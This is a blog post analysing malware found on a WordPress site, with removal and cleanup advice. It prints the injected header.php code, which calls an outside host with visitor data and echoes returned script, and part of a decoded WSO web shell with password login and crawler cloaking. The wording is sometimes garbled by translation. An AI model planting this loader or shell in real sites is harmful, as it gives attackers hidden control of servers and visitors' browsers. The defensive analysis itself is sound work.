WordPress Virus - PHP Hack - Remove WordPress Virus

A few days ago I noticed a device Code suspect (virus / malware) in the source of a running blog WordPress. The following PHP code was present in header.php, before the line .

<?php $wp_rssh = 'http'; $wp_gt = 'web'; error_reporting(0); ini_set('display_errors',0); $wp_uagent = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Firefox|MSIE/i', $wp_uagent) && preg_match ('/ NT/i', $wp_uagent))){
$wp_gturl=$wp_rssh."://".$wp_gt.$wp_rssh."s.com/".$wp_gt."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_uagent);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_gturl);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10); $wp_cntnt = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_cntnt,1,3) === 'scr' ){ echo $wp_cntnt; } ?>

I don't know exactly what this virus is called and nimci macit does exactly what it does, but it is invisible to visitors to the affected sites. Instead, it causes a huge ranking in search engines (especially in Google) and thus a significant decrease in the number of visitors to the affected web sites.

Details known about this virus files:

1. The above code present in header.php

2. Emergence file wp-log.php folder wp-includes.

wp-log

3. wp-log.php contain the following code, encrypted:

<?php eval(gzinflate(base64_decode('7b1rd../Fw=='))) ?>

Decryption code in wp-log.php:


<?php
$auth_pass = "md5password";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
#+Dump Columns ////Boolean
if(!empty($_SERVER['HTTP_USER_AGENT'])) {
    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler" );
    if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
        header('HTTP/1.0 404 Not Found');
        exit;
    }
}

@ini_set('error_log',NULL);
@ini_set('log_errors',0);
@ini_set('max_execution_time',0);
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@define('WSO_VERSION', '2.5');

if(get_magic_quotes_gpc()) {
    function WSOstripslashes($array) {
        return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    }
    $_POST = WSOstripslashes($_POST);
    $_COOKIE = WSOstripslashes($_COOKIE);
}

function wsoLogin() {
    die("
<pre align=center-->

<form method="post"><input name="pass" type="password" /><input type="submit" value="" /></form>" );
}

function WSOsetcookie($k, $v) {
$_COOKIE[$k] = $v;
setcookie($k, $v);
}

if(!empty($auth_pass)) {
if(isset($_POST['pass']) &amp;&amp; (md5($_POST['pass']) == $auth_pass))
WSOsetcookie(md5($_SERVER['HTTP_HOST']), $auth_pass);

if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $auth_pass))
wsoLogin();
}

if(strtolower(substr(PHP_OS,0,3)) == "win" )
$os = 'win';
else
$os = 'nix';

$safe_mode = @ini_get('safe_mode');
if(!$safe_mode)
error_reporting(0);

$disable_functions = @ini_get('disable_functions');
$home_cwd = @getcwd();
if(isset($_POST['c']))
@chdir($_POST['c']);
$cwd = @getcwd();
if($os == 'win') {
$home_cwd = str_replace("\\", "/", $home_cwd);
$cwd = str_replace("\\", "/", $cwd);
}
if($cwd[strlen($cwd)-1] != '/')
$cwd .= '/';
?>

4. If the page is accessed directly numeblog.com/wp-includes/wp-log.php a page with a field appears authentication. At first glance it seems to be a file manager.

WORDPRESS DEVIRUSING.

1. First delete the code from header.php and file wp-log.php from wp-includes.

2. Check the file .htaccess of suspicious directives. Permission lines or script execution.

3. Check the theme folder (/ wp-content /themes/ Nume_tema). Look for new files and existing ones (especially .php files) that have undergone suspicious changes.

4. Check the folder PluginCEs (wp-content/plugins).

5. Check wp-content of suspicious files.

6. Check write permissions for folders and files. chmod si chown.

WORDPRESS DEVIRUSING SUGGESTIONS.

1. First it is good to make a backup of all the blog files and the database.

2. Delete the folders wp-admin si wp-includes and all files . Php from the root of the site. If you have custom .php files, it's a good idea to check them manually.

3. Download the current version of WordPress and upload.

4. Check in the database if a user with administrator rank has not been created.

That's about all we have to say about this virus, but if you have additions or if we discover new details, we will be happy to update this article.

STEALTH SETTINGS - REMOVE WORDPRESS VIRUS .

Founder and editor Stealth Settings, from 2006 to the present. Experience on Linux operating systems (especially CentOS), Mac OS X, Windows XP> Windows 10 and WordPress (CMS).

Leave a Comment